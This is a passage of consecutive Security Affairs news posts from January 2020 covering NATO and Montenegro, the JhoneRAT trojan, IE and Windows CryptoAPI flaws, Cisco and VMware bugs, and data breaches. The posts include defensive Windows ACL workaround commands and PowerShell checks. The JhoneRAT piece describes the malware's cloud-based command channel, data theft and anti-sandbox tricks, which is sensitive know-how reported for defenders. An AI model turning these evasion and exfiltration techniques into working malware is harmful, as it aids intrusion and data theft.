Several countries, especially Russia, continue their aggressive operations against foreign states, and cyber warfare is becoming the main concern for almost any government.

The official explained that since 2014 the defence spending to face hybrid threats has continued to increase; it has been estimated that by 2024 that amount will reach $400 billion.

“NATO data shows a 4,6% increase in 2019. That is the fifth consecutive year of growth. By the end of this year, allies will have invested over $130 billion”, added Marshal Peach.

United States Army General Mark Milley, the highest military officer and military adviser to the President, Minister of Defence and U.S. National Security Council, accused the Russian Government of attempting to destabilize the members of the alliance and divide it.

“It is evident that Russia has been trying to divide NATO and make it weaker,” General Milley said.

“It would be their benefit. It would be detrimental to Europe and the US if NATO just collapsed and disintegrated.”

Representatives of Montenegro’s Defence Ministry confirmed that the NATO counter-hybrid team visited Montenegro in November. Experts fear that Russia could attempt to influence the forthcoming parliamentary elections that will take place in October 2020.

“This visit was the first such engagement in one of the allies, and it was an important experience for Montenegro. Montenegro wants to enhance its capacities and the focus of NATO’s team was on strengthening legislative framework in this domain and its implementation”, said Ivica Ivanović, director general for defence policy.

On June 5, 2017, Montenegro officially joined the NATO alliance despite strong opposition from the Russian Government, which threatened to retaliate.

Cybersecurity experts believe that a new wave of cyberattacks will hit the state. In February 2017, for the second time in a few months, Montenegro suffered massive and prolonged cyberattacks against government and media websites.

Researchers at security firm FireEye who analyzed the attacks observed malware and exploits associated with the notorious Russia-linked APT group known as APT28 (aka Fancy Bear, Pawn Storm, Strontium, Sofacy, Sednit, and Tsar Team).

Another massive attack hit the country’s institutions during October 2016 elections, amid speculation that the Russian Government was involved.

Hackers targeted Montenegro with spear-phishing attacks; the malicious messages used weaponized documents pertaining to a NATO secretary meeting and a visit by a European army unit to Montenegro.

At the time, the cyberspies delivered the GAMEFISH backdoor (aka Sednit, Seduploader, JHUHUGIT, and Sofacy), a malware that was used only by the APT28 group in past attacks.

Pierluigi Paganini

(SecurityAffairs – Montenegro, elections)

The post NATO will send a counter-hybrid team to Montenegro to face Russia’s threat appeared first on Security Affairs.

JhoneRAT uses Google Drive, Twitter, ImgBB, and Google Forms to target countries in Middle East

Researchers from Cisco Talos discovered a new Trojan named JhoneRAT that was used in targeted attacks against entities in the Middle East.

A new Trojan named JhoneRAT appeared in the threat landscape, it is selectively attacking targets in the Middle East by checking keyboard layouts.

The malware targets a very specific set of Arabic-speaking countries, including Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain, and Lebanon.

“Today, Cisco Talos is unveiling the details of a new RAT we have identified we’re calling “JhoneRAT.” This new RAT is dropped to the victims via malicious Microsoft Office documents.” reads the analysis published by Cisco Talos. “The dropper, along with the Python RAT, attempts to gather information on the victim’s machine and then uses multiple cloud services: Google Drive, Twitter, ImgBB and Google Forms.”


The experts discovered that the RAT is distributed via weaponized Office documents, it leverages multiple cloud services (i.e. Google Drive, Twitter, ImgBB and Google Forms) to avoid detection. 

JhoneRAT is written in Python; it attempts to download additional payloads and to upload the information gathered during the reconnaissance phase.

Talos researchers identified three weaponized Microsoft Office documents that download and load an additional document containing a macro. The first document, named “Urgent.docx”, dates back to November 2019.

The second document, named “fb.docx”, is dated January and claims to contain data on a Facebook information leak. The third document, found in mid-January, pretends to be from a legitimate United Arab Emirates organization.

The additional Office documents loaded and executed by the JhoneRAT are hosted through Google Drive in the attempt to avoid URL blacklisting. 

JhoneRAT is dropped through Google Drive, which hosts images with a base64-encoded binary appended at the end. Once such an image is loaded onto a target machine, the appended payload is decoded and the Trojan is deployed; it then harvests information from the victim’s machine (i.e. OS, disk serial numbers, the antivirus, and more).

The malware uses Twitter as its command-and-control (C2) channel: while exfiltrating information, it checks a public Twitter feed for new commands every 10 seconds.

“This RAT uses three different cloud services to perform all its command and control (C2) activities. It checks for new commands in the tweets from the handle @jhone87438316 (suspended by Twitter) every 10 seconds using the BeautifulSoup HTML parser to identify new tweets.” continues the analysis. “These commands can be issued to a specific victim based on the UID generated on each target (by using the disk serial and contextual information such as the hostname, the antivirus and the OS) or to all of them.”

Experts pointed out that stolen data are exfiltrated through cloud providers: for example, screenshots are uploaded to ImgBB, while commands are executed with their output sent to Google Forms. The malware downloads binaries disguised as pictures from Google Drive and executes them.

“The attacker put a couple of tricks in place to avoid execution on virtual machines (sandbox). The first trick is the check of the serial number of the disk. The actor used the same technique in the macro and in the JhoneRAT. By default, most of the virtual machines do not have a serial number on the disk.” continues the analysis.

“The attacker used a second trick to avoid analysis of the Python code. The actor used the same trick that FireEye in the Flare-On 6: Challenge 7: They removed the header of the Python bytecode.”

According to the experts, the campaign is still ongoing, even if the Twitter account is suspended, attackers can easily create new accounts and use them in the same way.

“This campaign shows a threat actor interested in specific Middle Eastern and Arabic-speaking countries. It also shows us an actor that puts effort in opsec by only using cloud providers.” concludes the report. “The malicious documents, the droppers and the RAT itself are developed around cloud providers. Additionally the attackers implemented anti-VM (and sandbox) and anti-analysis tricks to hide the malicious activities to the analyst.”

The analysis published by Talos contains additional technical details, including Indicators of Compromise.

Pierluigi Paganini

(SecurityAffairs – JhoneRAT, malware)

The post JhoneRAT uses Google Drive, Twitter, ImgBB, and Google Forms to target countries in Middle East appeared first on Security Affairs.

Security Affairs newsletter Round 247

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Google removed 1.7K+ Joker Malware infected apps from its Play Store
MageCart attack hit Australia bushfire Donors
New Bill prohibits intelligence sharing with countries using Huawei 5G equipment
5G – The Future of Security and Privacy in Smart Cities
Facebook quickly fixed a bug exploited in attacks that exposed Page Admins info
Hacker that hit UK National Lottery in 2016 was sentenced to prison
Maze Ransomware operators leak 14GB of files stolen from Southwire
US officials meet UK peers to remark the urgency to ban Huawei 5G tech
China-linked APT40 group hides behind 13 front companies
Cisco addressed a high-severity bug in Webex that could allow Remote Code Execution
January 2020 Adobe Patch Tuesday updates fix issues in Illustrator, Experience Manager
Why Russian APT Fancy Bear hacked the Ukrainian energy firm Burisma?
Hacker offers for sale 49 million user records from US data broker LimeLeads
Iranian Threat Actors: Preliminary Analysis
Microsoft addresses CVE-2020-0601 flaw, the first issue ever reported by NSA
P&N Bank data breach may have impacted 100,000 West Australians
VMware addresses flaws in VMware Tools and Workspace ONE SDK
5ss5c Ransomware emerges after Satan went down in the hell
Critical auth bypass issues affect InfiniteWP Client and WP Time Capsule WordPress plugins
Hundreds of million users installed Android fleeceware apps from Google Play
Two PoC exploits for CVE-2020-0601 NSACrypto flaw released
Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity
Expert released PoC exploits for recently disclosed Cisco DCNM flaws
Hack the Army bug bounty program paid $275,000 in rewards
Law enforcement seized WeLeakInfo.com for selling access to data from data breaches
Cybercrime Statistics in 2019
Microsoft provides mitigation for actively exploited CVE-2020-0674 IE Zero-Day
Turkish Hackers hit Greek Government websites and local stock exchange

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 247 appeared first on Security Affairs.

Microsoft provides mitigation for actively exploited CVE-2020-0674 IE Zero-Day

Microsoft published a security advisory to warn of an Internet Explorer (IE) zero-day vulnerability (CVE-2020-0674) that is currently being exploited in the wild.

Microsoft has published a security advisory (ADV200001) that includes mitigations for a zero-day remote code execution (RCE) vulnerability, tracked as CVE-2020-0674, affecting Internet Explorer.

The tech giant confirmed that the CVE-2020-0674 zero-day vulnerability has been actively exploited in the wild.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the advisory published by Microsoft. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

An attacker could exploit the flaw to gain the same user permissions as the user logged into the compromised Windows device. If the user is logged on with administrative permissions, the attacker can exploit the flaw to take full control of the system.

The CVE-2020-0674 flaw could be triggered by tricking victims into visiting a website hosting specially crafted content designed to exploit the issue through Internet Explorer.

Microsoft announced that it is currently working on a patch to address the vulnerability; the company will likely release an out-of-band update because attackers are already exploiting the flaw in the wild.

Microsoft suggests restricting access to JScript.dll using the following workaround to mitigate this zero-day flaw.

For 32-bit systems, enter the following command at an administrative command prompt:

    takeown /f %windir%\system32\jscript.dll
    cacls %windir%\system32\jscript.dll /E /P everyone:N

For 64-bit systems, enter the following command at an administrative command prompt:

    takeown /f %windir%\syswow64\jscript.dll
    cacls %windir%\syswow64\jscript.dll /E /P everyone:N
    takeown /f %windir%\system32\jscript.dll
    cacls %windir%\system32\jscript.dll /E /P everyone:N

The company warns that implementing these mitigations might impact the functionality of components or features that use jscript.dll.

“Implementing these steps might result in reduced functionality for components or features that rely on jscript.dll. To be fully protected, Microsoft recommends the update be installed as soon as possible. Please revert the mitigation steps before installing the update to return to a full state.” continues the advisory.

To undo the workaround, use the following procedures.

For 32-bit systems, enter the following command at an administrative command prompt:

    cacls %windir%\system32\jscript.dll /E /R everyone    

For 64-bit systems, enter the following command at an administrative command prompt:

    cacls %windir%\system32\jscript.dll /E /R everyone    
    cacls %windir%\syswow64\jscript.dll /E /R everyone
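As an added example (not from the Microsoft advisory or the original post), the following PowerShell function verifies that the workaround above is actually in place on a host: it reads the ACL of each jscript.dll copy and looks for an explicit Deny entry for Everyone. It assumes that the cacls everyone:N entry is stored as a Deny ACE for the Everyone SID (S-1-1-0); the function name is made up here.

```powershell
# Added example, not part of the Microsoft advisory or the original post.
# Verifies the ADV200001 workaround by checking each jscript.dll copy for an
# explicit Deny ACE assigned to Everyone. Assumption: cacls "everyone:N" is
# stored as a Deny ACE for SID S-1-1-0. The SID is compared instead of the
# display name so the check also works on localized Windows installs.
function Test-JscriptMitigation {
    [CmdletBinding()]
    param()

    $everyoneSid = New-Object System.Security.Principal.SecurityIdentifier 'S-1-1-0'

    # Native copy first; on 64-bit Windows the WOW64 copy matters as well,
    # which is why the advisory's 64-bit procedure touches both files.
    $paths = @("$env:windir\System32\jscript.dll")
    if ([System.Environment]::Is64BitOperatingSystem) {
        $paths += "$env:windir\SysWOW64\jscript.dll"
    }

    foreach ($path in $paths) {
        if (-not (Test-Path -LiteralPath $path)) {
            [pscustomobject]@{ Path = $path; Present = $false; Mitigated = $false; Owner = $null; DenyRights = $null }
            continue
        }

        $acl = Get-Acl -LiteralPath $path
        $denyAces = @($acl.Access | Where-Object {
            $_.AccessControlType -eq 'Deny' -and
            $(try { $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) -eq $everyoneSid } catch { $false })
        })

        [pscustomobject]@{
            Path       = $path
            Present    = $true
            # Any Deny entry for Everyone blocks loading the DLL for every user,
            # which is the effect the workaround is meant to have.
            Mitigated  = ($denyAces.Count -gt 0)
            # takeown leaves the file owned by the admin who ran it instead of
            # TrustedInstaller; useful when reviewing whether the steps were run.
            Owner      = $acl.Owner
            DenyRights = ($denyAces | ForEach-Object { $_.FileSystemRights.ToString() }) -join '; '
        }
    }
}

# Every present copy must report Mitigated = True. A False on a 64-bit host
# usually means only one of the two copies was restricted, so the workaround
# is incomplete until both are covered (or it was reverted before patching).
Test-JscriptMitigation | Format-Table -AutoSize
```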

Pierluigi Paganini

(SecurityAffairs – CVE-2020-0674, hacking)

The post Microsoft provides mitigation for actively exploited CVE-2020-0674 IE Zero-Day appeared first on Security Affairs.

Cybercrime Statistics in 2019

I’m preparing the slides for my next speech and I decided to create this post while searching for interesting cybercrime statistics in 2020.

Cybercrime will cost as much as $6 trillion annually by 2021.

The global expense for organizations to protect their systems from cybercrime attacks will continue to grow. According to Cybersecurity Ventures’ 2017 cybercrime statistics, cybercrime damages will amount to a staggering $6 trillion annually starting in 2021. Experts fear that the cost of cybercrime could exceed the annual cost of natural disasters by 2021. These figures suggest that cybercrime is becoming more profitable than other criminal activities, such as the illegal drug trade.

Financial losses reached $2.7 billion in 2018.

According to the IC3 Annual Report released in April 2019, financial losses reached $2.7 billion in 2018. The most financially devastating threats involved investment scams, business email compromise (BEC), and romance fraud.

The total cost of cybercrime for each company in 2019 reached US$13M.

The total cost of cybercrime for each company increased from US$11.7 million in 2017 to a new high of US$13.0 million—a rise of 12 percent, states the “NINTH ANNUAL COST OF CYBERCRIME STUDY” published by Accenture.

The total annual cost of all types of cyberattacks is increasing.

According to Accenture, malware and Web-based attacks continue to cause higher financial losses to organizations worldwide. The cost of ransomware attacks accounts for 21 percent of the overall expenses, while the cost of malicious insider accounts for 15 percent. The cost of malware attacks is now an average of US$2.6 million annually for organizations.

Source: Accenture

Which countries have the worst (and best) cybersecurity?

According to a report published by Comparitech that used the Global Cybersecurity Index (GCI) scores, Bangladesh saw the highest number of malware infections: approximately 35.91% of the country’s mobile users have fallen victim to malware infections. The same report states that Japan is the country best equipped at preventing cybersecurity threats, with the smallest number of mobile malware infections, only 1.34% of its mobile users having been affected by the attacks. Other top-performing countries included France, Canada, Denmark, and the United States.

Algeria is the least cyber-secure country, followed by Indonesia and Vietnam.

What is the impact of cybercrime on small businesses?

According to the 2019 Data Breach Investigations Report, 43% of all nefarious online activities impacted small businesses. Looking at the attacks suffered by organizations, 69% were perpetrated by outsiders, 34% involved internal actors, 5% featured multiple parties, and 2% involved partners.

According to the annual study conducted by IBM examining the financial impact of data breaches on organizations, the cost of a data breach has risen 12% over the past 5 years and now costs $3.92 million on average. These rising expenses are representative of the multiyear financial impact of breaches, increased regulation and the complex process of resolving criminal attacks. Small businesses with fewer than 500 employees lose an average of $2.5 million due to security incidents.

What about data breaches?

The majority of security breaches were financially motivated, 71%, while 25% of breaches were motivated by the gain of strategic advantage (espionage).

29% of breaches involved the use of stolen credentials, and 32% were the result of phishing attacks.


What about malware?

According to the Symantec 2019 Internet Security Threat Report, the number of attack groups using destructive malware increased by 25%, the number of ransomware attacks increased by 12%, and, most concerning, mobile malware increased by 33%.

Bots and worms continue to account for the vast majority of Internet of Things (IoT) attacks; in 2018 Symantec reported a significant increase in targeted attack actors going after smart objects, confirming the high interest in IoT as an infection vector.

Pierluigi Paganini

(SecurityAffairs – cybercrime statistics, hacking)

The post Cybercrime Statistics in 2019 appeared first on Security Affairs.

Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity

Chinese authorities continue operations against unauthorized VPN services that are very popular in the country.

China continues to intensify its monitoring of cyberspace and its prosecution of VPN services that could be used to bypass its censorship system, known as the Great Firewall.

The Great Firewall project has already blocked access to hundreds of the world’s top 1,000 websites, including Google, Facebook, Twitter, and Dropbox.

Since early 2019, the Chinese authorities have been banning “unauthorized” VPN services; any company offering such a service in the country must obtain an appropriate license from the government.

In December, the Chinese authorities sentenced a man to five-and-a-half years in prison for selling a VPN service without authorization.

According to an announcement from China’s Procuratorate Daily the man was also fined 500,000 yuan ($76,000). Prosecutors said the man was convicted of collecting “illegal revenue” of 792,638 yuan ($120,500) from his unauthorized activity.

Now media report a new arrest made by Chinese authorities in the city of Taizhou: the police arrested a man with the pseudonym of Gao (29) who had operated a VPN service since mid-2016. Gao made more than 11 million Chinese yuan ($1.6 million) from renting access to VPN servers to more than 28,000 regular customers; he pleaded guilty in 2019 and is still awaiting sentencing.

In December 2017, Chinese authorities sentenced a man from Dongguan to nine months in prison for operating a VPN service that allowed him to earn $2,000. Other criminal cases were reported by Chinese authorities in the following months, blocked services had thousands of customers in the country.

In July 2019, in compliance with the Chinese Internet monitoring law, Apple started removing all iOS VPN apps from its App Store in China.

Pierluigi Paganini

(SecurityAffairs – Chinese authorities, privacy)

The post Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity appeared first on Security Affairs.

Expert released PoC exploits for recently disclosed Cisco DCNM flaws

A researcher has publicly released some proof-of-concept (PoC) exploits and technical details for flaws in Cisco’s Data Center Network Manager (DCNM).

Early this month, Cisco released security updates for its Cisco’s Data Center Network Manager (DCNM) product that address several critical and high-severity vulnerabilities.

All the vulnerabilities were reported to Cisco through Trend Micro’s Zero Day Initiative (ZDI) and Accenture’s iDefense service by the security researcher Steven Seeley of Source Incite and Harrison Neal from PatchAdvisor.

Cisco published six advisories for a dozen vulnerabilities; eleven of them were reported by Seeley, and of these three have been rated as critical and seven as high severity. The issues reported by Neal have been rated as medium severity.

Some of the critical flaws addressed by Cisco in DCNM could be exploited by attackers to bypass authentication and execute arbitrary actions with admin privileges on the vulnerable devices.

“Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.” reads the advisory published by Cisco.

“For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.”

The vulnerabilities have been tracked as CVE-2019-15975, CVE-2019-15976 and CVE-2019-15977. The issues affect the REST API endpoint, the SOAP API endpoint and the web-based management interface.

Cisco also addressed two high-severity SQL injection flaws that could be exploited by an attacker with administrative privileges to execute arbitrary SQL commands on a vulnerable device.

Three of the high-severity weaknesses could be exploited by an attacker to conduct path traversal, and two other high-severity issues could be exploited by an attacker with admin rights to inject arbitrary commands on the underlying operating system.

Seeley provided technical details for three remote code execution chains and various techniques implemented in his exploits.

“In this post, I share three (3) full exploitation chains and multiple primitives that can be used to compromise different installations and setups of the Cisco DCNM product to achieve unauthenticated remote code execution as SYSTEM/root. In the third chain, I (ab)use the java.lang.InheritableThreadLocal class to perform a shallow copy to gain access to a valid session.” wrote Seeley in a blog post.

Cisco assigned only 11 CVE identifiers to the flaws reported by Seeley, who nonetheless found over 100 exploitable bugs, including a hundred SQL injection issues, two command injections, four instances of hardcoded keys and credentials, four cases of XML external entity (XXE) injection, and 20 file read/write/delete issues.

Cisco has updated the advisories informing its customers of the availability of PoC exploits.

“The Cisco Product Security Incident Response Team (PSIRT) is aware that proof-of-concept exploit code is available for the vulnerabilities that are described in this advisory.” states Cisco.

“Cisco PSIRT is not aware of any malicious use of the vulnerabilities that are described in this advisory.”

Pierluigi Paganini

(SecurityAffairs – Cisco DCNM, hacking)

The post Expert released PoC exploits for recently disclosed Cisco DCNM flaws appeared first on Security Affairs.

VMware addresses flaws in VMware Tools and Workspace ONE SDK

VMware has released security updates to address a local privilege escalation vulnerability in VMware Tools version 10 for Windows.

VMware has released VMware Tools 11.0.0, which addresses a local privilege escalation issue in Tools 10.x.y tracked as CVE-2020-3941. The issue is a race condition that could be exploited by an attacker with access to the guest virtual machine to escalate privileges.

“A malicious actor on the guest VM might exploit the race condition and escalate their privileges on a Windows VM. This issue affects VMware Tools for Windows version 10.x.y as the affected functionality is not present in VMware Tools 11.” reads the advisory published by the company.

The vulnerability has been assigned an important severity rating and a CVSS score of 7.8. The company also suggests a workaround in case users cannot upgrade their version.

“However, if upgrading is not possible, exploitation of this issue can be prevented by correcting the ACLs on C:\ProgramData\VMware\VMware CAF directory in the Windows guests running VMware Tools 10.x.y versions. In order to correct ACLs for this directory, remove all write access permissions for Standard User from the directory,” reads Workaround for VMware Tools for Windows security vulnerability (CVE-2020-3941) (76654).
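The VMware workaround is a manual ACL change; as an added example (not VMware’s code and not from the original post), this PowerShell function reports which entries on that directory grant write-class rights to the built-in Users group and, only when run with -Apply, removes them. It assumes “Standard User” means BUILTIN\Users (SID S-1-5-32-545) and that the directory is the one quoted above; the function name and the -Apply switch are made up here.

```powershell
# Added example, not VMware's code or part of the original post.
# Reports (and with -Apply removes) Allow ACEs on the VMware CAF directory that
# grant BUILTIN\Users (SID S-1-5-32-545) write-class rights, which is the
# workaround VMware describes for CVE-2020-3941. Assumption: "Standard User"
# means the built-in Users group.
function Repair-VMwareCafAcl {
    [CmdletBinding()]
    param(
        [string]$Path = "$env:ProgramData\VMware\VMware CAF",
        [switch]$Apply
    )

    $usersSid = New-Object System.Security.Principal.SecurityIdentifier 'S-1-5-32-545'
    $fsr = [System.Security.AccessControl.FileSystemRights]
    # Explicit write-class rights, plus the GENERIC_WRITE / GENERIC_ALL bits that
    # inherit-only ACEs on ProgramData subfolders often carry.
    $writeMask = [int]($fsr::Write -bor $fsr::Delete -bor $fsr::DeleteSubdirectoriesAndFiles -bor
                       $fsr::ChangePermissions -bor $fsr::TakeOwnership) -bor 0x40000000 -bor 0x10000000

    if (-not (Test-Path -LiteralPath $Path -PathType Container)) {
        throw "Directory not found: $Path (VMware Tools 10.x.y may not be installed)"
    }

    # Filter: Allow entries for the Users group that carry any write-class bit.
    $isUsersWrite = {
        $_.AccessControlType -eq 'Allow' -and
        $(try { $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) -eq $usersSid } catch { $false }) -and
        (([int]$_.FileSystemRights -band $writeMask) -ne 0)
    }

    $acl = Get-Acl -LiteralPath $Path
    $offending = @($acl.Access | Where-Object -FilterScript $isUsersWrite)

    if ($Apply -and @($offending | Where-Object { $_.IsInherited }).Count -gt 0) {
        # Inherited entries cannot be removed one at a time: break inheritance,
        # keeping copies of the inherited ACEs as explicit ones, then re-read.
        $acl.SetAccessRuleProtection($true, $true)
        Set-Acl -LiteralPath $Path -AclObject $acl
        $acl = Get-Acl -LiteralPath $Path
        $offending = @($acl.Access | Where-Object -FilterScript $isUsersWrite)
    }

    foreach ($ace in $offending) {
        $action = if ($Apply) { 'removed' } else { 'would remove (run with -Apply)' }
        [pscustomobject]@{
            Identity  = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights.ToString()
            Inherited = $ace.IsInherited
            Action    = $action
        }
        if ($Apply) { [void]$acl.RemoveAccessRule($ace) }
    }

    if ($Apply -and $offending.Count -gt 0) {
        Set-Acl -LiteralPath $Path -AclObject $acl
    }
}

# Report-only by default; applying the change requires an elevated prompt.
Repair-VMwareCafAcl | Format-Table -AutoSize
```

An empty report means no Users write entries remain, i.e. the workaround is already in effect on that host.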

Recently the virtualization giant also disclosed an information disclosure issue, tracked as CVE-2020-3940, that affects Workspace ONE SDK and dependent iOS and Android mobile applications.

Vulnerable applications do not properly handle certificate verification failures if SSL pinning is enabled in the UEM Console.

“A sensitive information disclosure vulnerability in the VMware Workspace ONE SDK was privately reported to VMware.” states the security advisory.

“A malicious actor with man-in-the-middle (MITM) network positioning between an affected mobile application and Workspace ONE UEM Device Services may be able to capture sensitive data in transit if SSL Pinning is enabled.” 

The vulnerability has been assigned an important severity rating and a CVSS score of 6.8.

The list of vulnerable applications and SDKs includes Workspace ONE Boxer, Content, Intelligent Hub, Notebook, People, PIV-D, Web, and the SDK plugins for Apache Cordova and Xamarin.

Pierluigi Paganini

(SecurityAffairs – VM, hacking)

The post VMware addresses flaws in VMware Tools and Workspace ONE SDK appeared first on Security Affairs.

P&N Bank data breach may have impacted 100,000 West Australians

P&N Bank discloses data breach, customer account information, balances exposed

The Australian P&N Bank is notifying its customers of a data breach that has exposed personally identifiable information (PII) and sensitive account data.

P&N Bank, a division of Police & Nurses Limited operating in Western Australia, suffered a data breach and is reporting the incident to its customers; attackers accessed personally identifiable information (PII) and sensitive account data.

According to The West Australian website, hackers have stolen personal information from 100,000 West Australians in the cyber attack.

P&N Bank confirmed that intruders accessed names, addresses, email addresses, phone numbers, customer numbers, ages, account numbers, and account balances. The bank pointed out that passwords, Social Security numbers, Tax file numbers, driver’s license or passport details, credit card numbers, and dates of birth have not been exposed. 

P&N Bank sent a data breach notification to its customers and reported the incident to law enforcement. According to the incident notice, the breach impacted the customer relationship management (CRM) platform; the bank stated that “certain personal information […] appears to have been accessed as a result of online criminal activity.”

The cyber attack took place around December 12, when the financial institution was performing a server upgrade. Hackers likely targeted a third-party company that the bank had hired to provide hosting services.

The bank announced that it has locked out the attackers and fixed the flaw they exploited.

“Upon becoming aware of the attack, we immediately shut down the source of the vulnerability, and have since been working closely with WAPOL, other federal authorities, our third-party IT provider involved, regulators” continues the data breach notification.

The bank hired external experts to help it investigate the incident.

P&N Bank highlighted that there is no evidence of customer accounts or funds being compromised.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post P&N Bank data breach may have impacted 100,000 West Australians appeared first on Security Affairs.

Hacker offers for sale 49 million user records from US data broker LimeLeads

49 million user records from US data broker LimeLeads were available for sale on a hacking forum.

49 million user records from US data broker LimeLeads were available for sale on a hacking forum; the data had been exposed on an unsecured Elasticsearch server.

Exposed LimeLeads data contains full name, title, user email, employer/company name, company address, city, state, ZIP, phone number, website URL, company total revenue, and the company’s estimated number of employees.

The news was first reported by ZDNet. LimeLeads sells access to a database of business contacts that can be used for marketing activities.

ZDNet was alerted to the availability of the records two weeks ago; a hacker using the handle Omnichorus was selling LimeLeads’ data online.

“Sources in the threat intelligence community have told ZDNet that Omnichorus is a well-known individual on underground hacking forums, having built a reputation for sharing and selling hacked or stolen data — a so-called “data trader.”” reported ZDNet.

The company failed to properly configure its Elasticsearch server and accidentally exposed it online, allowing anyone to access its content.

The popular data leak hunter Bob Diachenko confirmed to ZDNet that the exposed records were stored in an internal Elasticsearch server that had been accidentally exposed online and indexed by the Shodan search engine since at least July 27, 2019.

Diachenko also added that he had already reported the presence of the data online to LimeLeads on September 16, and that the company secured the Elasticsearch DB within one day. This means that the database remained exposed online for more than a month and that someone likely accessed its content and tried to monetize it by selling the data.

Omnichorus has been selling the data since October 2019; the availability of these data online poses a risk to the companies and individuals whose records were included in the database.

A threat actor could launch a spear-phishing attack against them and perform a broad range of malicious activities.

Pierluigi Paganini

(SecurityAffairs – LimeLeads, hacking)

The post Hacker offers for sale 49 million user records from US data broker LimeLeads appeared first on Security Affairs.

Microsoft addresses CVE-2020-0601 flaw, the first issue ever reported by NSA

Microsoft has released a security update to address “a broad cryptographic vulnerability” that is impacting its Windows operating system.

Microsoft Patch Tuesday updates for January 2020 address a total of 49 vulnerabilities in various products, including a serious flaw, tracked as CVE-2020-0601, in the core cryptographic component of Windows 10, Server 2016 and 2019 editions.

The CVE-2020-0601 vulnerability differs from previously addressed flaws in that it was reported by the NSA; this is the first time the US intelligence agency has reported a bug to the tech giant.

The flaw, dubbed ‘NSACrypt’ and tracked as CVE-2020-0601, resides in the Crypt32.dll module, which contains various ‘Certificate and Cryptographic Messaging functions’ used by the Windows Crypto API for data encryption.

The flaw affects the way the Crypt32.dll module validates Elliptic Curve Cryptography (ECC) certificates.

In a press release published by the NSA, the agency explains “the certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution.”

“A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.” reads the security advisory published by Microsoft.

“An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.”

An attacker could exploit the flaw to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.

An attacker could also trigger the issue to spoof digital signatures on software, tricking the system into believing that it is a legitimate application.

Microsoft addressed the issue by ensuring that Windows CryptoAPI completely validates ECC certificates.

Microsoft did not release technical details of the vulnerability to avoid its public exploitation.

Microsoft confirmed that it is not aware of attacks in the wild exploiting the CVE-2020-0601 flaw.

“This month we addressed the vulnerability CVE-2020-0601 in the usermode cryptographic library, CRYPT32.DLL, that affects Windows 10 systems. This vulnerability is classed Important and we have not seen it used in active attacks.” reads a blog post published by Microsoft.

“This vulnerability is one example of our partnership with the security research community where a vulnerability was privately disclosed and an update released to ensure customers were not put at risk.”

The NSA has also released a security advisory that includes mitigation information.

“NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality. The certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution.” reads the NSA’s advisory.

“The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available”.

Microsoft also addressed 48 other vulnerabilities, 8 of which are rated critical and the remaining ones important.

None of the issues addressed this month by Microsoft were being exploited in the wild.

Pierluigi Paganini

(SecurityAffairs – CVE-2020-0601, hacking)

The post Microsoft addresses CVE-2020-0601 flaw, the first issue ever reported by NSA appeared first on Security Affairs.

January 2020 Adobe Patch Tuesday updates fix issues in Illustrator, Experience Manager

Adobe released its January 2020 Patch Tuesday updates that address several flaws in Illustrator and Experience Manager products.

Adobe has released its first 2020 Patch Tuesday software updates, which address several vulnerabilities in Illustrator and Experience Manager products.

“Adobe has published security bulletins for Adobe Experience Manager (APSB20-01) and Adobe Illustrator (APSB20-03). Adobe recommends users update their product installations to the latest versions using the instructions referenced in the bulletin.” reads the security advisory.

The security updates for Illustrator CC 2019 for Windows address five critical memory corruption issues (CVE-2020-3710, CVE-2020-3711, CVE-2020-3712, CVE-2020-3713, CVE-2020-3714) that can lead to arbitrary code execution in the context of the targeted user.

All the vulnerabilities were reported to Adobe by Honggang Ren of Fortinet’s FortiGuard Labs.

While the vulnerabilities have been assigned a severity rating of critical, their priority rating is 3, which means Adobe does not expect any of them to be exploited in attacks.

Adobe also released security updates for Adobe Experience Manager (AEM) that address four issues rated important and moderate (CVE-2019-16466, CVE-2019-16467, CVE-2019-16468, CVE-2019-16469).

The flaws rated important are reflected cross-site scripting (XSS) or Expression Language injection issues and could lead to the disclosure of sensitive information. The security hole rated moderate has been described as a user interface injection issue, and it can also lead to the disclosure of sensitive information.

The flaws tracked as CVE-2019-16466 and CVE-2019-16468 were reported to Adobe by the security expert Lorenzo Pirondini of Netcentric.

Pierluigi Paganini

(SecurityAffairs – Adobe Patch Tuesday, hacking)

The post January 2020 Adobe Patch Tuesday updates fix issues in Illustrator, Experience Manager appeared first on Security Affairs.

Why Russian APT Fancy Bear hacked the Ukrainian energy firm Burisma?

A Russia-linked cyber-espionage group hacked the Ukrainian energy company Burisma, the firm at the center of the impeachment trial of US President Donald Trump.

The Russian cyberspies, operating under Russia’s GRU military intelligence agency (aka Fancy Bear), carried out a spear-phishing campaign in November aimed at accessing the email of Burisma Holdings employees.

